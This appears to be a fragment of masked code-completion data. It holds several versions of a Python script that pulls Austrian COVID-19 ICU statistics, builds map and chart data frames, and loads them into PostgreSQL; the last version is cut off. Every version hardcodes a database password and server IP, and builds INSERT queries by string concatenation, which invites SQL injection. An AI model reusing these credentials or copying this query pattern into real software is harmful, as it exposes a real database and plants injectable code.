"step-2": "<mask token>\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', sep=';', index=\n False)\n<mask token>\nfor i in df['MeldeDatum']:\n i = i.replace('.', '')\n i = i.replace(':', '')\n timestamps.append(dt.datetime.strptime(i, '%d%m%Y %H%M%S'))\n<mask token>\nfor a, b in zip(df['FZHosp'], df['FZICU']):\n l_temp.append(a + b)\n<mask token>\nfor a, b in zip(df['FZICU'], df['FZICUFree']):\n l_temp.append(a + b)\n<mask token>\nfor a, b in zip(df['FZICU'], df['ICU_capacity']):\n try:\n l_temp.append(100.0 * float(a) / float(b))\n except ZeroDivisionError:\n l_temp.append(0.0)\n<mask token>\nfor i in states:\n temp = df[df['Bundesland'] == i]\n ls_df.append(temp)\n<mask token>\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/ICU_data.csv')\n<mask token>\ndf2.to_pickle('/var/www/FlaskApp/FlaskApp/data/df2.pkl')\n<mask token>\ndf_map.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_map.pkl')\ndf_map.drop(['BundeslandID', 'GID_0', 'NAME_0', 'NAME_1', 'GID_1',\n 'VARNAME_1', 'NL_NAME_1', 'TYPE_1', 'ENGTYPE_1', 'CC_1', 'HASC_1',\n 'test_value'], axis=1).to_csv('/var/www/FlaskApp/FlaskApp/data/df_map.csv',\n index=False)\n<mask token>\ndf_perc.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_perc.pkl')\n<mask token>\ndf_FZICU.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_FZICU.pkl')\n<mask token>\ndf_ICU_cap.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_ICU_cap.pkl')\n<mask token>\nfile_object.write('Success: ' + date_time + '\\n')\nfile_object.close()\n<mask token>\nwith open('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', 'r') as f:\n instr = ''\n reader = csv.reader(f, delimiter=';')\n next(reader)\n for row in reader:\n instr = instr + (\"INSERT INTO icu_data VALUES ('\" + str(row[0]) +\n \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(row[3]) +\n \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" + str(row[6]) +\n \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"');\")\n<mask token>\ncsv.field_size_limit(sys.maxsize)\nwith open('/var/www/FlaskApp/FlaskApp/data/df_map.csv', 'r') as f:\n instr_map = ''\n reader = csv.reader(f, delimiter=',')\n next(reader)\n for row in reader:\n instr_map = instr_map + (\"INSERT INTO icu_map VALUES ('\" + str(row[\n 0]) + \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(\n row[3]) + \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" +\n str(row[6]) + \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"','\" +\n str(row[9]) + \"','\" + str(row[10]) + \"');\")\n<mask token>\n\n\ndef csv_parser(statement):\n import psycopg2\n return_ls = []\n try:\n connection = psycopg2.connect(user='icu_bot', password=\n '5B2xwP8h4Ln4Y8Xs', host='85.214.150.208', port='5432',\n database='ICU')\n cursor = connection.cursor()\n sql_Query = statement\n cursor.execute(sql_Query)\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print('Error while fetching data from PostgreSQL: ', error)\n finally:\n if connection:\n cursor.close()\n connection.close()\n return return_ls\n\n\ncsv_parser('DELETE FROM icu_data')\ncsv_parser(instr)\ncsv_parser('DELETE FROM icu_map')\ncsv_parser(instr_map)\n<mask token>\ntry:\n df_geojson = pd.read_json(\n 'https://zgis187.geo.sbg.ac.at/geoserver/IPSDI_WT20/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=IPSDI_WT20%3Aicu_map&maxFeatures=50&outputFormat=application%2Fjson'\n )\n df_geojson.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_geojson.pkl')\nexcept:\n print('an exception occured connecting to the geoserver')\n",
"step-3": "url = 'https://covid19-dashboard.ages.at/data/CovidFallzahlen.csv'\n<mask token>\ndf = pd.read_csv(url, sep=';')\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', sep=';', index=\n False)\n<mask token>\ntimestamps = []\nfor i in df['MeldeDatum']:\n i = i.replace('.', '')\n i = i.replace(':', '')\n timestamps.append(dt.datetime.strptime(i, '%d%m%Y %H%M%S'))\ndf['MeldeDatum'] = timestamps\ndf = df.drop(['Meldedat'], axis=1)\nstates = list(df['Bundesland'].unique())\nl_temp = []\nfor a, b in zip(df['FZHosp'], df['FZICU']):\n l_temp.append(a + b)\ndf['Hospitalizations_total'] = l_temp\nl_temp = []\nfor a, b in zip(df['FZICU'], df['FZICUFree']):\n l_temp.append(a + b)\ndf['ICU_capacity'] = l_temp\nl_temp = []\nfor a, b in zip(df['FZICU'], df['ICU_capacity']):\n try:\n l_temp.append(100.0 * float(a) / float(b))\n except ZeroDivisionError:\n l_temp.append(0.0)\ndf['ICU_perc'] = l_temp\nls_df = []\nfor i in states:\n temp = df[df['Bundesland'] == i]\n ls_df.append(temp)\nadm1 = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_1.shp')\nadm0 = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_0.shp')\ndf = df.round(1)\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/ICU_data.csv')\nmost_recent_date = df['MeldeDatum'].max()\ndf2 = df.loc[df['MeldeDatum'] == most_recent_date]\ndf2.to_pickle('/var/www/FlaskApp/FlaskApp/data/df2.pkl')\ndf_map = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/austria_adm1.geojson')\ndf_map['Bundesland'] = df_map['NAME_1']\ndf_map = pd.merge(df2, df_map, on='Bundesland')\ndf_map = gpd.GeoDataFrame(df_map, geometry='geometry')\ndf_map.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_map.pkl')\ndf_map.drop(['BundeslandID', 'GID_0', 'NAME_0', 'NAME_1', 'GID_1',\n 'VARNAME_1', 'NL_NAME_1', 'TYPE_1', 'ENGTYPE_1', 'CC_1', 'HASC_1',\n 'test_value'], axis=1).to_csv('/var/www/FlaskApp/FlaskApp/data/df_map.csv',\n index=False)\n<mask token>\ndf_perc = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['ICU_perc']), 'Burgenland': np.asarray(df.loc[df['Bundesland'] ==\n 'Burgenland']['ICU_perc']), 'Kärnten': np.asarray(df.loc[df[\n 'Bundesland'] == 'Kärnten']['ICU_perc']), 'Niederösterreich': np.\n asarray(df.loc[df['Bundesland'] == 'Niederösterreich']['ICU_perc']),\n 'Oberösterreich': np.asarray(df.loc[df['Bundesland'] ==\n 'Oberösterreich']['ICU_perc']), 'Salzburg': np.asarray(df.loc[df[\n 'Bundesland'] == 'Salzburg']['ICU_perc']), 'Steiermark': np.asarray(df.\n loc[df['Bundesland'] == 'Steiermark']['ICU_perc']), 'Tirol': np.asarray\n (df.loc[df['Bundesland'] == 'Tirol']['ICU_perc']), 'Vorarlberg': np.\n asarray(df.loc[df['Bundesland'] == 'Vorarlberg']['ICU_perc']), 'Wien':\n np.asarray(df.loc[df['Bundesland'] == 'Wien']['ICU_perc'])})\ndf_perc.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_perc.pkl')\ndf_FZICU = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['FZICU']), 'Burgenland': np.asarray(df.loc[df['Bundesland'] ==\n 'Burgenland']['FZICU']), 'Kärnten': np.asarray(df.loc[df['Bundesland'] ==\n 'Kärnten']['FZICU']), 'Niederösterreich': np.asarray(df.loc[df[\n 'Bundesland'] == 'Niederösterreich']['FZICU']), 'Oberösterreich': np.\n asarray(df.loc[df['Bundesland'] == 'Oberösterreich']['FZICU']),\n 'Salzburg': np.asarray(df.loc[df['Bundesland'] == 'Salzburg']['FZICU']),\n 'Steiermark': np.asarray(df.loc[df['Bundesland'] == 'Steiermark'][\n 'FZICU']), 'Tirol': np.asarray(df.loc[df['Bundesland'] == 'Tirol'][\n 'FZICU']), 'Vorarlberg': np.asarray(df.loc[df['Bundesland'] ==\n 'Vorarlberg']['FZICU']), 'Wien': np.asarray(df.loc[df['Bundesland'] ==\n 'Wien']['FZICU'])})\ndf_FZICU.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_FZICU.pkl')\ndf_ICU_cap = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['ICU_capacity']), 'Burgenland': np.asarray(df.loc[df[\n 'Bundesland'] == 'Burgenland']['ICU_capacity']), 'Kärnten': np.asarray(\n df.loc[df['Bundesland'] == 'Kärnten']['ICU_capacity']),\n 'Niederösterreich': np.asarray(df.loc[df['Bundesland'] ==\n 'Niederösterreich']['ICU_capacity']), 'Oberösterreich': np.asarray(df.\n loc[df['Bundesland'] == 'Oberösterreich']['ICU_capacity']), 'Salzburg':\n np.asarray(df.loc[df['Bundesland'] == 'Salzburg']['ICU_capacity']),\n 'Steiermark': np.asarray(df.loc[df['Bundesland'] == 'Steiermark'][\n 'ICU_capacity']), 'Tirol': np.asarray(df.loc[df['Bundesland'] ==\n 'Tirol']['ICU_capacity']), 'Vorarlberg': np.asarray(df.loc[df[\n 'Bundesland'] == 'Vorarlberg']['ICU_capacity']), 'Wien': np.asarray(df.\n loc[df['Bundesland'] == 'Wien']['ICU_capacity'])})\ndf_ICU_cap.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_ICU_cap.pkl')\nfile_object = open('/var/www/FlaskApp/FlaskApp/log.txt', 'a')\nnow = datetime.now()\ndate_time = now.strftime('%m/%d/%Y, %H:%M:%S')\nfile_object.write('Success: ' + date_time + '\\n')\nfile_object.close()\n<mask token>\nwith open('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', 'r') as f:\n instr = ''\n reader = csv.reader(f, delimiter=';')\n next(reader)\n for row in reader:\n instr = instr + (\"INSERT INTO icu_data VALUES ('\" + str(row[0]) +\n \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(row[3]) +\n \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" + str(row[6]) +\n \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"');\")\n<mask token>\ncsv.field_size_limit(sys.maxsize)\nwith open('/var/www/FlaskApp/FlaskApp/data/df_map.csv', 'r') as f:\n instr_map = ''\n reader = csv.reader(f, delimiter=',')\n next(reader)\n for row in reader:\n instr_map = instr_map + (\"INSERT INTO icu_map VALUES ('\" + str(row[\n 0]) + \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(\n row[3]) + \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" +\n str(row[6]) + \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"','\" +\n str(row[9]) + \"','\" + str(row[10]) + \"');\")\n<mask token>\n\n\ndef csv_parser(statement):\n import psycopg2\n return_ls = []\n try:\n connection = psycopg2.connect(user='icu_bot', password=\n '5B2xwP8h4Ln4Y8Xs', host='85.214.150.208', port='5432',\n database='ICU')\n cursor = connection.cursor()\n sql_Query = statement\n cursor.execute(sql_Query)\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print('Error while fetching data from PostgreSQL: ', error)\n finally:\n if connection:\n cursor.close()\n connection.close()\n return return_ls\n\n\ncsv_parser('DELETE FROM icu_data')\ncsv_parser(instr)\ncsv_parser('DELETE FROM icu_map')\ncsv_parser(instr_map)\n<mask token>\ntry:\n df_geojson = pd.read_json(\n 'https://zgis187.geo.sbg.ac.at/geoserver/IPSDI_WT20/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=IPSDI_WT20%3Aicu_map&maxFeatures=50&outputFormat=application%2Fjson'\n )\n df_geojson.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_geojson.pkl')\nexcept:\n print('an exception occured connecting to the geoserver')\n",
"step-4": "url = 'https://covid19-dashboard.ages.at/data/CovidFallzahlen.csv'\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\ndf = pd.read_csv(url, sep=';')\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', sep=';', index=\n False)\nimport datetime as dt\nfrom datetime import datetime\nimport time\ntimestamps = []\nfor i in df['MeldeDatum']:\n i = i.replace('.', '')\n i = i.replace(':', '')\n timestamps.append(dt.datetime.strptime(i, '%d%m%Y %H%M%S'))\ndf['MeldeDatum'] = timestamps\ndf = df.drop(['Meldedat'], axis=1)\nstates = list(df['Bundesland'].unique())\nl_temp = []\nfor a, b in zip(df['FZHosp'], df['FZICU']):\n l_temp.append(a + b)\ndf['Hospitalizations_total'] = l_temp\nl_temp = []\nfor a, b in zip(df['FZICU'], df['FZICUFree']):\n l_temp.append(a + b)\ndf['ICU_capacity'] = l_temp\nl_temp = []\nfor a, b in zip(df['FZICU'], df['ICU_capacity']):\n try:\n l_temp.append(100.0 * float(a) / float(b))\n except ZeroDivisionError:\n l_temp.append(0.0)\ndf['ICU_perc'] = l_temp\nls_df = []\nfor i in states:\n temp = df[df['Bundesland'] == i]\n ls_df.append(temp)\nadm1 = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_1.shp')\nadm0 = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_0.shp')\ndf = df.round(1)\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/ICU_data.csv')\nmost_recent_date = df['MeldeDatum'].max()\ndf2 = df.loc[df['MeldeDatum'] == most_recent_date]\ndf2.to_pickle('/var/www/FlaskApp/FlaskApp/data/df2.pkl')\ndf_map = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/austria_adm1.geojson')\ndf_map['Bundesland'] = df_map['NAME_1']\ndf_map = pd.merge(df2, df_map, on='Bundesland')\ndf_map = gpd.GeoDataFrame(df_map, geometry='geometry')\ndf_map.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_map.pkl')\ndf_map.drop(['BundeslandID', 'GID_0', 'NAME_0', 'NAME_1', 'GID_1',\n 'VARNAME_1', 'NL_NAME_1', 'TYPE_1', 'ENGTYPE_1', 'CC_1', 'HASC_1',\n 'test_value'], axis=1).to_csv('/var/www/FlaskApp/FlaskApp/data/df_map.csv',\n index=False)\n<mask token>\ndf_perc = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['ICU_perc']), 'Burgenland': np.asarray(df.loc[df['Bundesland'] ==\n 'Burgenland']['ICU_perc']), 'Kärnten': np.asarray(df.loc[df[\n 'Bundesland'] == 'Kärnten']['ICU_perc']), 'Niederösterreich': np.\n asarray(df.loc[df['Bundesland'] == 'Niederösterreich']['ICU_perc']),\n 'Oberösterreich': np.asarray(df.loc[df['Bundesland'] ==\n 'Oberösterreich']['ICU_perc']), 'Salzburg': np.asarray(df.loc[df[\n 'Bundesland'] == 'Salzburg']['ICU_perc']), 'Steiermark': np.asarray(df.\n loc[df['Bundesland'] == 'Steiermark']['ICU_perc']), 'Tirol': np.asarray\n (df.loc[df['Bundesland'] == 'Tirol']['ICU_perc']), 'Vorarlberg': np.\n asarray(df.loc[df['Bundesland'] == 'Vorarlberg']['ICU_perc']), 'Wien':\n np.asarray(df.loc[df['Bundesland'] == 'Wien']['ICU_perc'])})\ndf_perc.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_perc.pkl')\ndf_FZICU = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['FZICU']), 'Burgenland': np.asarray(df.loc[df['Bundesland'] ==\n 'Burgenland']['FZICU']), 'Kärnten': np.asarray(df.loc[df['Bundesland'] ==\n 'Kärnten']['FZICU']), 'Niederösterreich': np.asarray(df.loc[df[\n 'Bundesland'] == 'Niederösterreich']['FZICU']), 'Oberösterreich': np.\n asarray(df.loc[df['Bundesland'] == 'Oberösterreich']['FZICU']),\n 'Salzburg': np.asarray(df.loc[df['Bundesland'] == 'Salzburg']['FZICU']),\n 'Steiermark': np.asarray(df.loc[df['Bundesland'] == 'Steiermark'][\n 'FZICU']), 'Tirol': np.asarray(df.loc[df['Bundesland'] == 'Tirol'][\n 'FZICU']), 'Vorarlberg': np.asarray(df.loc[df['Bundesland'] ==\n 'Vorarlberg']['FZICU']), 'Wien': np.asarray(df.loc[df['Bundesland'] ==\n 'Wien']['FZICU'])})\ndf_FZICU.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_FZICU.pkl')\ndf_ICU_cap = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['ICU_capacity']), 'Burgenland': np.asarray(df.loc[df[\n 'Bundesland'] == 'Burgenland']['ICU_capacity']), 'Kärnten': np.asarray(\n df.loc[df['Bundesland'] == 'Kärnten']['ICU_capacity']),\n 'Niederösterreich': np.asarray(df.loc[df['Bundesland'] ==\n 'Niederösterreich']['ICU_capacity']), 'Oberösterreich': np.asarray(df.\n loc[df['Bundesland'] == 'Oberösterreich']['ICU_capacity']), 'Salzburg':\n np.asarray(df.loc[df['Bundesland'] == 'Salzburg']['ICU_capacity']),\n 'Steiermark': np.asarray(df.loc[df['Bundesland'] == 'Steiermark'][\n 'ICU_capacity']), 'Tirol': np.asarray(df.loc[df['Bundesland'] ==\n 'Tirol']['ICU_capacity']), 'Vorarlberg': np.asarray(df.loc[df[\n 'Bundesland'] == 'Vorarlberg']['ICU_capacity']), 'Wien': np.asarray(df.\n loc[df['Bundesland'] == 'Wien']['ICU_capacity'])})\ndf_ICU_cap.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_ICU_cap.pkl')\nfile_object = open('/var/www/FlaskApp/FlaskApp/log.txt', 'a')\nnow = datetime.now()\ndate_time = now.strftime('%m/%d/%Y, %H:%M:%S')\nfile_object.write('Success: ' + date_time + '\\n')\nfile_object.close()\n<mask token>\nimport csv\nwith open('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', 'r') as f:\n instr = ''\n reader = csv.reader(f, delimiter=';')\n next(reader)\n for row in reader:\n instr = instr + (\"INSERT INTO icu_data VALUES ('\" + str(row[0]) +\n \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(row[3]) +\n \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" + str(row[6]) +\n \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"');\")\nimport csv\nimport sys\ncsv.field_size_limit(sys.maxsize)\nwith open('/var/www/FlaskApp/FlaskApp/data/df_map.csv', 'r') as f:\n instr_map = ''\n reader = csv.reader(f, delimiter=',')\n next(reader)\n for row in reader:\n instr_map = instr_map + (\"INSERT INTO icu_map VALUES ('\" + str(row[\n 0]) + \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(\n row[3]) + \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" +\n str(row[6]) + \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"','\" +\n str(row[9]) + \"','\" + str(row[10]) + \"');\")\n<mask token>\n\n\ndef csv_parser(statement):\n import psycopg2\n return_ls = []\n try:\n connection = psycopg2.connect(user='icu_bot', password=\n '5B2xwP8h4Ln4Y8Xs', host='85.214.150.208', port='5432',\n database='ICU')\n cursor = connection.cursor()\n sql_Query = statement\n cursor.execute(sql_Query)\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print('Error while fetching data from PostgreSQL: ', error)\n finally:\n if connection:\n cursor.close()\n connection.close()\n return return_ls\n\n\ncsv_parser('DELETE FROM icu_data')\ncsv_parser(instr)\ncsv_parser('DELETE FROM icu_map')\ncsv_parser(instr_map)\n<mask token>\ntry:\n df_geojson = pd.read_json(\n 'https://zgis187.geo.sbg.ac.at/geoserver/IPSDI_WT20/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=IPSDI_WT20%3Aicu_map&maxFeatures=50&outputFormat=application%2Fjson'\n )\n df_geojson.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_geojson.pkl')\nexcept:\n print('an exception occured connecting to the geoserver')\n",
"step-5": "# csv URL\nurl = \"https://covid19-dashboard.ages.at/data/CovidFallzahlen.csv\"\n\n# read csv from URL\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\ndf=pd.read_csv(url,sep=\";\")\ndf.to_csv(\"/var/www/FlaskApp/FlaskApp/data/covid_data.csv\",sep=\";\",index=False)\n\n# transforming timestamps to proper DateTime format\nimport datetime as dt\nfrom datetime import datetime\nimport time\ntimestamps = []\nfor i in df[\"MeldeDatum\"]:\n i = i.replace(\".\",\"\")\n i = i.replace(\":\",\"\")\n timestamps.append(dt.datetime.strptime(i, \"%d%m%Y %H%M%S\"))\ndf[\"MeldeDatum\"] = timestamps\ndf = df.drop([\"Meldedat\"], axis=1)\n\n# get List of State Names\nstates = list(df[\"Bundesland\"].unique())\n\n# append total hospitalizations to DF\nl_temp = []\nfor a,b in zip(df[\"FZHosp\"],df[\"FZICU\"]):\n l_temp.append(a+b)\ndf[\"Hospitalizations_total\"] = l_temp\n\n# append total ICU capacity to DF\nl_temp = []\nfor a,b in zip(df[\"FZICU\"],df[\"FZICUFree\"]):\n l_temp.append(a+b)\ndf[\"ICU_capacity\"] = l_temp\n\n# append ICU occupancy percentages to DF\nl_temp = []\nfor a,b in zip(df[\"FZICU\"],df[\"ICU_capacity\"]):\n try:\n l_temp.append(100.0 * float(a)/float(b))\n except ZeroDivisionError:\n l_temp.append(0.0)\ndf[\"ICU_perc\"] = l_temp\n\n# create list of dataframes by Bundesland\nls_df = []\nfor i in states:\n temp = df[df[\"Bundesland\"]==i]\n ls_df.append(temp)\n \n# importing adm0 and adm1 shapefilesas geopandas dataframes\nadm1 = gpd.read_file(\"/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_1.shp\")\nadm0 = gpd.read_file(\"/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_0.shp\")\n\n#writing to json\n#adm1.to_file(\"data/austria_adm1.geojson\", driver=\"GeoJSON\")\n#adm0.to_file(\"data/austria_adm0.geojson\", driver=\"GeoJSON\") \n\n# save CSV after manipulating & rounding\ndf = df.round(1)\ndf.to_csv(\"/var/www/FlaskApp/FlaskApp/data/ICU_data.csv\")\n\n# create most recent DF for map\nmost_recent_date = df['MeldeDatum'].max()\ndf2 = df.loc[df['MeldeDatum'] == most_recent_date]\ndf2.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df2.pkl\")\n\n# join geometries with most recent data per state\ndf_map =gpd.read_file(\"/var/www/FlaskApp/FlaskApp/data/austria_adm1.geojson\")\ndf_map[\"Bundesland\"] = df_map[\"NAME_1\"]\ndf_map = pd.merge(df2,df_map,on=\"Bundesland\")\ndf_map = gpd.GeoDataFrame(df_map, geometry=\"geometry\")\ndf_map.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df_map.pkl\")\n# drop unused columns and save file in data folder\ndf_map.drop([\"BundeslandID\",\"GID_0\",\"NAME_0\",\"NAME_1\",\"GID_1\",\"VARNAME_1\",\"NL_NAME_1\",\"TYPE_1\",\"ENGTYPE_1\",\"CC_1\",\"HASC_1\",\"test_value\"],axis=1).to_csv(\"/var/www/FlaskApp/FlaskApp/data/df_map.csv\",index=False)\n\n\n\"\"\"\nCREATE DFs FOR UPDATE GRAPHS\n\"\"\"\ndf_perc = pd.DataFrame({\n \"MeldeDatum\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"MeldeDatum\"]),\n \"Alle\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"ICU_perc\"]),\n \"Burgenland\": np.asarray(df.loc[df[\"Bundesland\"] == \"Burgenland\"][\"ICU_perc\"]),\n \"Kärnten\": np.asarray(df.loc[df['Bundesland'] == \"Kärnten\"][\"ICU_perc\"]),\n \"Niederösterreich\": np.asarray(df.loc[df[\"Bundesland\"] == \"Niederösterreich\"][\"ICU_perc\"]),\n \"Oberösterreich\": np.asarray(df.loc[df['Bundesland'] == \"Oberösterreich\"][\"ICU_perc\"]),\n \"Salzburg\": np.asarray(df.loc[df[\"Bundesland\"] == \"Salzburg\"][\"ICU_perc\"]),\n \"Steiermark\": np.asarray(df.loc[df['Bundesland'] == \"Steiermark\"][\"ICU_perc\"]),\n \"Tirol\": np.asarray(df.loc[df[\"Bundesland\"] == \"Tirol\"][\"ICU_perc\"]),\n \"Vorarlberg\": np.asarray(df.loc[df['Bundesland'] == \"Vorarlberg\"][\"ICU_perc\"]),\n \"Wien\": np.asarray(df.loc[df[\"Bundesland\"] == \"Wien\"][\"ICU_perc\"]),\n})\ndf_perc.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df_perc.pkl\")\n\ndf_FZICU = pd.DataFrame({\n \"MeldeDatum\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"MeldeDatum\"]),\n \"Alle\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"FZICU\"]),\n \"Burgenland\": np.asarray(df.loc[df[\"Bundesland\"] == \"Burgenland\"][\"FZICU\"]),\n \"Kärnten\": np.asarray(df.loc[df['Bundesland'] == \"Kärnten\"][\"FZICU\"]),\n \"Niederösterreich\": np.asarray(df.loc[df[\"Bundesland\"] == \"Niederösterreich\"][\"FZICU\"]),\n \"Oberösterreich\": np.asarray(df.loc[df['Bundesland'] == \"Oberösterreich\"][\"FZICU\"]),\n \"Salzburg\": np.asarray(df.loc[df[\"Bundesland\"] == \"Salzburg\"][\"FZICU\"]),\n \"Steiermark\": np.asarray(df.loc[df['Bundesland'] == \"Steiermark\"][\"FZICU\"]),\n \"Tirol\": np.asarray(df.loc[df[\"Bundesland\"] == \"Tirol\"][\"FZICU\"]),\n \"Vorarlberg\": np.asarray(df.loc[df['Bundesland'] == \"Vorarlberg\"][\"FZICU\"]),\n \"Wien\": np.asarray(df.loc[df[\"Bundesland\"] == \"Wien\"][\"FZICU\"]),\n})\ndf_FZICU.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df_FZICU.pkl\")\n\ndf_ICU_cap = pd.DataFrame({\n \"MeldeDatum\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"MeldeDatum\"]),\n \"Alle\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"ICU_capacity\"]),\n \"Burgenland\": np.asarray(df.loc[df[\"Bundesland\"] == \"Burgenland\"][\"ICU_capacity\"]),\n \"Kärnten\": np.asarray(df.loc[df['Bundesland'] == \"Kärnten\"][\"ICU_capacity\"]),\n \"Niederösterreich\": np.asarray(df.loc[df[\"Bundesland\"] == \"Niederösterreich\"][\"ICU_capacity\"]),\n \"Oberösterreich\": np.asarray(df.loc[df['Bundesland'] == \"Oberösterreich\"][\"ICU_capacity\"]),\n \"Salzburg\": np.asarray(df.loc[df[\"Bundesland\"] == \"Salzburg\"][\"ICU_capacity\"]),\n \"Steiermark\": np.asarray(df.loc[df['Bundesland'] == \"Steiermark\"][\"ICU_capacity\"]),\n \"Tirol\": np.asarray(df.loc[df[\"Bundesland\"] == \"Tirol\"][\"ICU_capacity\"]),\n \"Vorarlberg\": np.asarray(df.loc[df['Bundesland'] == \"Vorarlberg\"][\"ICU_capacity\"]),\n \"Wien\": np.asarray(df.loc[df[\"Bundesland\"] == \"Wien\"][\"ICU_capacity\"]),\n})\ndf_ICU_cap.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df_ICU_cap.pkl\")\n\n# Writing to logfile\nfile_object = open('/var/www/FlaskApp/FlaskApp/log.txt', 'a')\nnow = datetime.now() # current date and time\ndate_time = now.strftime(\"%m/%d/%Y, %H:%M:%S\")\nfile_object.write('Success: '+date_time+\"\\n\")\nfile_object.close()\n\n\n\n\"\"\"\n\nDB CONNECTOR\n\n\"\"\"\n\n# DB create string from csv for COVID data\nimport csv\nwith open('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', 'r') as f:\n instr = \"\"\n reader = csv.reader(f,delimiter=\";\")\n #print(reader)\n next(reader) # Skip the header row.\n for row in reader:\n instr=instr+(\"INSERT INTO icu_data VALUES ('\"+str(row[0])+\"','\"+str(row[1])+\"','\"+str(row[2])+\"','\"+str(row[3])+\"','\"+str(row[4])+\"','\"+str(row[5])+\"','\"+str(row[6])+\"','\"+str(row[7])+\"','\"+str(row[8])+\"');\" ) \n\n# DB create string from csv for MAP data\nimport csv\nimport sys\ncsv.field_size_limit(sys.maxsize)\nwith open('/var/www/FlaskApp/FlaskApp/data/df_map.csv', 'r') as f:\n instr_map = \"\"\n reader = csv.reader(f,delimiter=\",\")\n #print(reader)\n next(reader) # Skip the header row.\n for row in reader:\n instr_map=instr_map+(\"INSERT INTO icu_map VALUES ('\"+str(row[0])+\"','\"+str(row[1])+\"','\"+str(row[2])+\"','\"+str(row[3])+\"','\"+str(row[4])+\"','\"+str(row[5])+\"','\"+str(row[6])+\"','\"+str(row[7])+\"','\"+str(row[8])+\"','\"+str(row[9])+\"','\"+str(row[10])+\"');\" )\n\n\"\"\" connecting to DB, parsing SQL statements \"\"\"\ndef csv_parser(statement):\n import psycopg2\n return_ls = []\n try:\n connection = psycopg2.connect(user=\"icu_bot\",\n password=\"5B2xwP8h4Ln4Y8Xs\",\n host=\"85.214.150.208\",\n port=\"5432\",\n 